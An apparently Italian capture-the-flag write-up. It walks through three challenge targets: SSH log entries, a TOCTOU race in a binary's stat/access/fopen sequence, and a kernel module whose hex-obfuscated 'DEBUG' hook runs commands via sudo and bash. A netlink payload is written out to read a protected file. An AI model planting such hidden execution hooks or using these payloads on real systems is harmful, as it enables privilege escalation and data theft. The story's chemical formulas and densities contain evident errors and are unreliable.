Untitled

       `å██▄ ^╚▒╖                                                  .▄▓█
          ███  ╓▒▒                                                    ██
        ▄██▀ ,╥▒╙ ▄▓*╙▀▓   ▄▌*╙▀▓╕  ,▄▀T╙▀▌,*▓▓¥   ╓▓    ½▓* ▄▌*╙▀▓,  ██╓▄▓██▓▄
    .φ▓▌TJ╓▄▒^`   ██╕  ^  ██    ╟█µ╔█▌    ██ ╙█▌  ,▌█▓   ▓`,██    ▓█  ██^    å█▓
      ▓██  ╙██▄    ▀██▓▄ ║█▌╙╙╙╙å▀^▓█▀╙╙╙╙▀▀  å█╕ ▓ └█▌ ▐▀ ╫█▌╙╙╙╙å▀  ██      ██
     ,███  ▓██^  -╕   ╙██ ██,      ╙█▓         ██╣`  ╙█▌▌  └██        ██     ,█▀
  ,▄▓█▀T╓▄█▀T     █▄╓╓▄▀T  ▀█▓▄▄φ#* "▀█▓▄▄φΦ^   █Γ    ╙█    `▀█▓▄▄φΦ² ██▓▄╦╗=▀Γ
                                         ,, ,, ,, ,, ,, ,,    ,,,,, ,, ,  ,,  ╓
                                        ╫ J╫  ▌▌╩▒W╝$  ▌▌$░╬▓ ▐ ▓≈⌐ å≈▌▌ ▐  ▌▌<╫ free4all


#1 target
Invalid user FTcc..sb1 from 212.25.179.164
Accepted password for kermit from 212.25.179.164 port 39157 ssh

#2 target

Time-of-Check-Time-of-Use Race condition
https://capec.mitre.org/data/definitions/29.html

binary: gmanager

00000000004013f2         call       sleep@PLT
00000000004013f7         lea        rax, qword [ss:rbp+var_4B0]
00000000004013fe         mov        rsi, rax                                    ; argument #2 for method stat
0000000000401401         mov        edi, 0x401c31                               ; "./lastlog", argument #1 for method stat
0000000000401406         call       stat                                        <----------
000000000040140b         mov        dword [ss:rbp+var_C], eax
000000000040140e         cmp        dword [ss:rbp+var_C], 0x0
0000000000401412         jne        0x4014bc

0000000000401418         mov        esi, 0x2                                    ; argument "amode" for method access@PLT
000000000040141d         mov        edi, 0x401c31                               ; "./lastlog", argument "path" for method access@PLT
0000000000401422         call       access@PLT                                  <---------- TOC
0000000000401427         test       eax, eax
0000000000401429         jne        0x4014a8

000000000040142b         mov        edi, 0x2                                    ; argument "seconds" for method sleep@PLT
0000000000401430         call       sleep@PLT                                   <---------- our time
0000000000401435         mov        esi, 0x401c3b                               ; 0x401c3b (_IO_stdin_used + 0x33b), argument "mode" for method fopen@PLT
000000000040143a         mov        edi, 0x401c31                               ; "./lastlog", argument "filename" for method fopen@PLT
000000000040143f         call       fopen@PLT                                   <---- TOU


La tua missione continua qui:

hostname: 212.25.162.150
username: public
password: je3gi7to

Recupera la formula del vaccino contenuta nel file /home/monday/antigene_sbc

Complimenti!
Sei riuscito a recuperare in tempo la formula del vaccino di nuova generazione su cui stava lavorando la Quality Cloud Farmaceutic.
Di seguito sono riportate le sostanze usate, con le opportune caratteristiche:

- Acido Acetilsalicilico, formula bruta C7H6O3, P molecolare 138 uma, d=140 g/cm3
- Anidride Acetica , formula bruta C4H6O3, P molecolare 109 uma, d=1,08 g/cm3
- Acido acetilsalicilico, formula bruta C9H8O4, P molecolare=180 uma, d=1,35 g/cm3
- Acido acetico, formula bruta C2H4O2, P molecolare 60 uma,d 1,05 g/cm3

Il tuo prossimo obiettivo:

hostname: 212.25.162.9
username: anonymous
password: fe7feeng

Ottieni le informazioni contenute in /etc/BlackoutResurrection


#3 target

lsmod
CODICE MODULO KERNEL: /develop/context_switch/

#ifdef DEBUG
#define DGB_TOOL "/usr/share/nl/"

            else if (!strncmp(comm,"DEBUG",5))                  <--------
            {
                char scpt[1024];
                memset(scpt,'\0',sizeof(scpt));
                strncat(scpt,DGB_TOOL,strlen(DGB_TOOL));
                strncat(scpt,arg,sizeof(scpt)-strlen(DGB_TOOL)-1);      <------

                char *debug[] = { "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x75\x64\x6f", -> '/usr/bin/sudo'
                    "\x2d\x75", -> '-u'
                    "\x23\x31\x33", -> '#13'
                    "\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68", -> '/bin/bash'
                    "\x2d\x63", -> '-c'
                    scpt,
                    "\x4e\x55\x4c\x4c" }; -> 'NULL'
                call_usermodehelper(debug[0], debug, NULL, UMH_WAIT_EXEC);              <------

            }
#endif

SEND TO KERNEL A NETLINK MESSAGE WITH A CUSTOM PAYLOAD:

 memset(&dest_addr, 0, sizeof(dest_addr));
 dest_addr.nl_family = AF_NETLINK;
 dest_addr.nl_pid = 0;   /* For Linux Kernel */
 dest_addr.nl_groups = 0; /* unicast */

 nlh=(struct nlmsghdr *)malloc(
                         NLMSG_SPACE(MAX_PAYLOAD));
 /* Fill the netlink message header */
 nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
 nlh->nlmsg_pid = getpid();  /* self pid */
 nlh->nlmsg_flags = 0;
 /* Fill in the netlink message payload */
 strcpy(NLMSG_DATA(nlh), "DEBUG=cat /etc/BlackoutResurrection");        <-------

Complimenti!
Sei riuscito a localizzare il covo hacker in cui sono tenuti i dispositivi contenenti informazioni riservate della Quality Cloud Farmaceutic.

Indirizzo: Finsbury Park, Greater London, Inghilterra
Codice Postale: N4
Latitudine: 51.5647
Longitudine: -⁠0.1064
Precisione: 4

#END

@seeweblive NEXT TIME TRY MORE HARDER !!!! ;)


we are proud to say thanks to the underground scene from all Italy,
especially the greatest hacker aranZulla, the god of hacking emgentili,
(D)al ch(E)cco (FT), the red crew "de-micheli e andst7" for their work on fake accounts on twitter, voidsec, the backbox team.
we grew up eating bread, CLUSIT guide and blackhatz songz by astharot. We hope to see you @Smau